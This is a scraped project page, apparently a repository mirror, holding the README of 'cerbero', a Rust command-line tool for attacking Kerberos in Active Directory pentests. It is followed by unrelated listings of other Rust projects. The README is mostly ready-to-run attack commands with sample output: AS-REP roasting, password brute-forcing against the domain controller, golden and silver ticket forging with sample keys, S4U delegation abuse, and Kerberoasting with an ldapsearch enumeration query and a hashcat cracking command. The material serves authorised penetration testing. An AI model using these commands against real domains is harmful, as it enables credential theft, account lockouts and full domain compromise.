Kerberos protocol attacker

Related tags

Cryptography cerbero
Overview

Cerbero

Crates.io Language Rust

Kerberos protocol attacker. Tool to perform several tasks related with Kerberos protocol in an Active Directory pentest.

Installation

From crates:

cargo install cerbero

From repo:

git clone https://gitlab.com/Zer1t0/cerbero.git
cd cerbero/
cargo install --path .

Commands

Ask

The ask command allows to retrieve Kerberos tickets (TGT/TGS) from the KDC (Domain Controller in Active Directory environment). Moreover, it also perform requests to obtain tickets by using the S4U2Self and S4U2Proxy Kerberos extensions.

TGT

Ask TGT:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234!
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache

TGS

Ask TGS:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -s ldap/dc01
INFO - Get contoso.local/anakin TGT for contoso.local from anakin.ccache
INFO - Request contoso.local/anakin TGS for ldap/dc01
INFO - Save contoso.local/anakin TGS for ldap/dc01 in anakin.ccache

Inter-realm TGS:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -s ldap/dc01.poke.mon

S4U2self

Perform S4u2self:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache

Inter-realm S4U2proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i poke.mon/pikachu

Perform S4u2self for a given service of the user:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han --user-service service/anakin
INFO - Get contoso.local/anakin TGT for contoso.local from anakin.ccache
INFO - Request contoso.local/han S4U2Self TGS for service/anakin
INFO - Save contoso.local/han S4U2Self TGS for service/anakin in anakin.ccache

S4U2proxy

Perform S4u2proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s service2/leia
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
WARN - No contoso.local/han S4U2Self TGS for contoso.local/anakin found
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache
INFO - Request contoso.local/han S4U2Proxy TGS for service2/leia
INFO - Save contoso.local/han S4U2proxy TGS for service2/leia in anakin.ccache

Inter-realm S4U2Proxy:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s service/pikachu.poke.mon

You can also perform s4u2proxy by changing the target service in the final TGS for the user:

$ cerbero ask -vv -u contoso.local/anakin -p Vader1234! -i han -s HTTP/dc01 --rename-service ldap/dc01
WARN - No contoso.local/anakin TGT for contoso.local found in anakin.ccache: No TGT found for 'anakin
INFO - Request contoso.local/anakin TGT for contoso.local
INFO - Save contoso.local/anakin TGT for contoso.local in anakin.ccache
WARN - No contoso.local/han S4U2Self TGS for service/anakin found
INFO - Request contoso.local/han S4U2Self TGS for contoso.local/anakin
INFO - Save contoso.local/han S4U2Self TGS for contoso.local/anakin in anakin.ccache
INFO - Request contoso.local/han S4U2Proxy TGS for HTTP/dc01
INFO - Received contoso.local/han S4U2proxy TGS for HTTP/dc01
INFO - Rename service from HTTP/dc01 to ldap/dc01
INFO - Save contoso.local/han S4U2proxy TGS for ldap/dc01 in anakin.ccache

AsRepRoast

asreproast can be used to discover users that do not require pre-authentication and retrieve a ticket to crack with hashcat or john.

Check many users:

cerbero asreproast under.world users.txt

Check many users with weak RC4 cipher (easier to crack):

cerbero asreproast under.world users.txt --cipher rc4

Brute

brute performs TGTs requests in order to discover user credentials based on the KDC response. This bruteforce technique allows you to discover:

  • Valid username/password pairs
  • Valid usernames
  • Expired passwords
  • Blocked or disabled users

This attack should be performed carefully since can block user accounts in case of perform many incorrect authentication attemps for the same user.

Test many users and passwords:

cerbero brute under.world users.txt passwords.txt

Test one user and many passwords:

cerbero brute under.world Zeus passwords.txt

Test many users and one password:

cerbero brute under.world users.txt Olympus1234

Test one user and one password:

cerbero brute under.world Zeus Olympus1234

Convert

convert ticket files between krb (Windows) and ccache (Linux) formats.

Convert ccache to krb:

$ cerbero convert -i anakin.ccache -o anakin.krb -vv
INFO - Read anakin.ccache with ccache format
INFO - Detected krb format from output file extension
INFO - Save anakin.krb with krb format

Convert krb to ccache:

$ cerbero convert -i anakin.krb -o anakin.ccache -vv
INFO - Read anakin.krb with krb format
INFO - Detected ccache format from output file extension
INFO - Save anakin.ccache with ccache format

Craft

To craft golden and silver tickets.

Craft a golden ticket (by using the krbtgt AES256 key):

$ cerbero craft -u under.world/kratos --sid S-1-5-21-658410550-3858838999-180593761 --aes fed0c966ff7f88d776bb35fed0f039725f8bbb87017d5b6b76ee848f25562d2c -vv
INFO - Save kratos TGT in kratos.ccache

Craft a silver ticket (for the service cifs hosted by the machine styx):

$ cerbero craft -u under.world/kratos --sid S-1-5-21-658410550-3858838999-180593761 --ntlm 29f9ab984728cc7d18c8497c9ee76c77 -s cifs/styx,under.world -vv
INFO - Save kratos TGS for cifs/styx.under.world in kratos.ccache

Hash

Calculate the Kerberos keys (password hashes) from the user password.

Calculate RC4 key (NT hash):

$ cerbero hash 'IamtheKingofD34d!!'
rc4:86e0a04f7a44ed4d4a7eaf2ee977c799

Calculate all the keys:

$ cerbero hash 'IamtheKingofD34d!!' -u under.world/Hades
rc4:86e0a04f7a44ed4d4a7eaf2ee977c799
aes128:fe165dec904772a90a177069e4ea7019
aes256:1304965c35176aeb72e1ae5fdd6c2fe2e901af7223cb75f5eaac25ad667136e7

Kerberoast

To format encrypted part of tickets in order to be cracked by hashcat or john.

You need to provide a file with the user services. Each line of the file must have one of the following formats:

  • user
  • domain/user
  • user:spn
  • domain/user:spn

When a service SPN is not specified, then a NT-ENTERPRISE principal is used. This can also be useful to bruteforce users with services.

An example file is the following:

sara
jack:HTTP/webserver
cake.com/john
cake.com/peter:HTTP/peter-pc

By using that file you could obtain a result like the following:

$ cerbero kerberoast u contoso.local/jaime -p Jama1234! -s /tmp/users.txt | tee /tmp/hashes.txt
$krb5tgs$23$*sara$CONTOSO.LOCAL$sara@contoso.local*$637b06b244ad69bf30d9b0a956c6143....5f69271
$krb5tgs$23$*jack$CONTOSO.LOCAL$HTTP/webserver*$8723987493798178273879856c6....ab78677
$krb5tgs$23$*john$CAKE.COM$john@CAKE.COM*$87687619876bde9879879879....1111111
$krb5tgs$23$*peter$CAKE.COM$HTTP/peter-pc*$2c77d95792f1393d3f25aec157823....4f6085f

To get a list of users with services you can use ldapsearch:

$ ldapsearch -h 192.168.100.2 -b "dc=contoso,dc=local" -w Vader1234!  -D "[email protected]" "(&(samAccountType=805306368)(servicePrincipalName=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" samaccountname | grep -i samaccountname: | cut -d ' ' -f 2 | tee users.txt
anakin
leia

The tickets could be cracked by using the following hashcat command:

$ hashcat -m 13100 /tmp/hashes.txt wordlist.txt

List

list displays information of credentials files (ccache/krb) or keytabs. Similar to klist command.

Show the credentials information of a ccache file:

$ cerbero list hades.ccache
Ticket cache (ccache): FILE:hades.ccache

[email protected] => krbtgt/[email protected]
Valid starting: 01/12/2021 12:08:09
Expires: 01/12/2021 22:08:09
Renew until: 01/19/2021 12:08:09
Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Etype (skey, tkt): 18 -> aes256-cts-hmac-sha1-96, 18 -> aes256-cts-hmac-sha1-96

Show the keys of a keytab file:

$ cerbero list user.keytab
Keytab: user.keytab

[email protected]
Name type: 1 -> nt-principal
Key: 8846f7eaee8fb117ad06bdd830b7586c
Key type: 23 -> rc4-hmac
Time: 01/17/2021 16:26:23
Version: 1

If no file is provided, it will try to search the default credential file set in the KRB5CCNAME environment variable . However, if the option -K is provided, it will try to show the keytab file specified in the KRB5_KTNAME environment variable.

Credits

This work is based on great work of other people:

You might also like...
Voice over the BitcoinSV protocol (made for CoinGeek 2021)

The BitcoinPhone Voice over the Bitcoin protocol. Setup Instructions for Mac Install rust https://www.rust-lang.org/tools/install Install homebrew htt

A fast and secure multi protocol honeypot.

Medusa A fast and secure multi protocol honeypot that can mimic realistic devices running ssh, telnet, http, https or any other tcp and udp servers. W

⛏ An open protocol for launching liquidity mining programs on Solana.
⛏ An open protocol for launching liquidity mining programs on Solana.

⛏ Quarry An open protocol for launching liquidity mining programs on Solana. Background Quarry was built with the intention of helping more Solana pro

A PoC backbone for NFT Marketplaces on NEAR Protocol
A PoC backbone for NFT Marketplaces on NEAR Protocol

NFT Market Reference Implementation A PoC backbone for NFT Marketplaces on NEAR Protocol. Reference Changelog Changelog Progress: basic purchase of NF

Smart contracts powering Spectrum Protocol on Terra

Spectrum Core Contracts This monorepository contains the source code for the core smart contracts implementing Spectrum Protocol on the Terra blockcha

Ecoball Node is the Official Rust implementation of the Ecoball protocol.

Ecoball Node is the Official Rust implementation of the Ecoball protocol. It is a fork of OpenEthereum - https://github.com/openethereum/

Terabethia - A Bridge and Messaging Protocol between Ethereum and the Internet Computer.
Terabethia - A Bridge and Messaging Protocol between Ethereum and the Internet Computer.

Terabethia - A Bridge Between Ethereum & the Internet Computer Terabethia is a bridge between Ethereum & the Internet Computer that contracts in both

A command-line tool to export FoundationDB stored protocol buffers to ClickhouseDB

fdb-ch-proto-export A command-line tool to export FoundationDB stored Protocol buffers to ClickhouseDB. Installation N/A Usage fdb-ch [command] fdb-c

The protocol are designed and made for the future of cross-IP, cross-chain metaverse.

Avatar-protocol 化身协议 This project demonstrates how to use the Solana Javascript API to interact with programs on the Solana blockchain. The project co

Owner
Eloy
Eloy
Reference client for NEAR Protocol

Reference implementation of NEAR Protocol About NEAR NEAR's purpose is to enable community-driven innovation to benefit people around the world. To ac

NEAR 2k Jan 3, 2023
Official Rust implementation of the Nimiq protocol

Nimiq Core implementation in Rust (core-rs) Rust implementation of the Nimiq Blockchain Core Nimiq is a frictionless payment protocol for the web. Thi

Nimiq 72 Sep 23, 2022
Rust implementation of Zcash protocol

The Parity Zcash client. Gitter Blog: Parity teams up with Zcash Foundation for Parity Zcash client Installing from source Installing the snap Running

Parity Technologies 183 Sep 8, 2022
An implementation of the OPAQUE password-authenticated key exchange protocol

The OPAQUE key exchange protocol OPAQUE is an asymmetric password-authenticated key exchange protocol. It allows a client to authenticate to a server

Novi 178 Jan 9, 2023
A prototype implementation of the Host Identity Protocol v2 for bare-metal systems, written in pure-rust.

Host Identity Protocol for bare-metal systems, using Rust I've been evaluating TLS replacements in constrained environments for a while now. Embedded

null 31 Dec 12, 2022
A substrate pallet that enables Manta's decentialized anynonymous payment (DAP) protocol.

This is a pallet that enables decentialized anynonymous payment (DAP) protocol. The best way to use this repo is to invoke it with a manta-runtime, available from either manta-node or cumulus.

Manta Network 27 Nov 23, 2022
Basilisk node - cross-chain liquidity protocol built on Substrate

Basilisk node Local Development Follow these steps to prepare a local Substrate development environment ??️ Simple Setup Install all the required depe

Galactic Council 52 Dec 27, 2022
Metaplex is a protocol built on top of Solana that allows: Creating/Minting non-fungible tokens;

Metaplex is a protocol built on top of Solana that allows: Creating/Minting non-fungible tokens; Starting a variety of auctions for primary/secondary

Metaplex Foundation 3.2k Jan 4, 2023
A safe implementation of the secure remote password authentication and key-exchange protocol (SRP), SRP6a and legacy are as features available.

Secure Remote Password (SRP 6 / 6a) A safe implementation of the secure remote password authentication and key-exchange protocol (SRP version 6a). Ver

Sven Assmann 10 Nov 3, 2022
A Rust implementation of the Message Layer Security group messaging protocol

Molasses An extremely early implementation of the Message Layer Security group messaging protocol. This repo is based on draft 4 of the MLS protocol s

Trail of Bits 109 Dec 13, 2022